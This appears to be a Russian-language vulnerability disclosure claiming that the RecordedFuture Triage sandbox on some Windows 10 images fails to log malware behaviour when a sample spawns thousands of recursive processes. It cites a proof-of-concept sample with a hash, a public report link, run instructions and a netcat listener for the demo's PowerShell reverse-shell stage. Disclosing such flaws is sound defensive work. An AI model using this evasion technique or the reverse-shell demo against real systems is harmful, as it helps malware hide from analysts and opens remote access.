
Критическая уязвимость (9.8) - движок динамического анализа RecordedFuture Triage может не фиксировать вредоносное поведение, когда образцы вызывают рекурсивное порождение процессов с очень высокой интенсивностью, что приводит к неполным или отсутствующим отчётам о поведении.
Песочница RecordedFuture Triage для Windows 10 сборки 2004 и Windows 10 LTSC 2021 содержит критическую уязвимость в своём движке поведенческого анализа Windows, которая позволяет отправленному образцу вредоносного ПО избежать обнаружения и вызвать отказ в анализе. Уязвимость срабатывает, когда образец рекурсивно порождает большое количество дочерних процессов, генерируя высокий объём журналов и истощая системные ресурсы. В результате ключевое вредоносное поведение, включая выполнение PowerShell и активность обратной оболочки, может не записываться или не сообщаться, вводя аналитиков в заблуждение и ставя под угрозу целостность и доступность результатов анализа в песочнице.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HОбразец vathos_rev.exe (SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b) демонстрирует состояние отказа в анализе в движке поведенческого анализа Windows платформы RecordedFuture Triage.
При запуске в конфигурациях Windows 10 образец рекурсивно порождает тысячи дочерних процессов, истощая ресурсы отслеживания процессов и журналирования. В результате песочница сообщает минимум поведенческих данных и не фиксирует ключевые вредоносные действия.
win10v2004-20250610-enx64104s213s1/10vathos_rev.exewin10ltsc2021-20250619-enx64105s215s1/10vathos_rev.exeВ обеих средах песочницы Windows 10 детонация не смогла зафиксировать ожидаемые этапы выполнения PowerShell и обратной оболочки, несмотря на то, что вредоносное ПО выполняло эти действия на хосте.
Движок поведенческого анализа песочницы оказался насыщен рекурсивным порождением процессов, что привело к усечённой или отсутствующей телеметрии.
Это подтверждает уязвимость типа отказ в анализе: движок поведенческого анализа не сообщает о вредоносной активности при высокой рекурсии и объёме журналов, что приводит к ложноположительным результатам и неполным данным криминалистического исследования.
Ссылка на публичный отчёт:
https://tria.ge/250822-qfystshk51
Это уязвимость типа отказ в анализе в RecordedFuture Triage, которая может привести к тому, что движок динамического анализа не сможет захватить или сообщить о поведенческой активности. Эксплуатация позволяет злоумышленникам обходить поведенческое обнаружение и получать неполные или отсутствующие отчёты анализа.
Ключевые последствия
Последствия для дальнейшего анализа
vathos_rev.exe
3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4bdca2fc8f69f6493c7a9c1ce9a68b24549b4688ba4788e34bce47d91b0accc98d33dbf8d2924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b270 КБ250822-qfystshk51win10ltsc2021-20250619-enx642025-08-22 13:12 UTC2025-08-22 13:18 UTC250822-qfystshk51win10v2004-20250610-enx642025-08-22 13:12 UTC2025-08-22 13:18 UTCПримечание: Сведения о сборке движка и внутренней версии не раскрываются RecordedFuture публично.
Все наблюдения основаны на воспроизводимых публичных детонациях с платформы Triage компании RecordedFuture (отправка250822-qfystshk51).
Предоставленная демонстрация воспроизводит состояние отказа в анализе (DoA) за счёт генерации очень высокого объёма процессов и глубоко вложенной активности во время выполнения. Демонстрация порождает множество дочерних процессов и выполняет многоэтапное XOR-дешифрование перед финальным этапом обратной оболочки PowerShell. В уязвимых образах Windows 10 Triage финальный этап полезной нагрузки не записывается или усекается, тогда как другие образы (например, Windows 11) захватывают полное поведение.
Как запустить
poc/vathos_demo.exe <IP> <PORT>
Запустите слушатель (например, nc -lvp 4444) на указанном IP/порту, чтобы наблюдать попытки подключения. Демонстрация порождает очень большое количество процессов и выполняет многоэтапное XOR-дешифрование, кульминацией которого является этап обратной оболочки PowerShell. В затронутых конфигурациях Triage финальный этап полезной нагрузки может не записываться, несмотря на то, что образец выполняет его на хосте.
Рисунок 1 - Панель обзора Triage

Рисунок 2 - Отчёт о поведении Windows 10 v2004 (минимальная телеметрия / пример DoA)

Рисунок 3 - Отчёт о поведении Windows 10 LTSC 2021 (минимальная телеметрия / пример DoA)

Рисунок 4 - Пример зарегистрированных процессов в Windows 10 LTSC (очищено, не все процессы зарегистрированы) — журналы анализа → Процессы
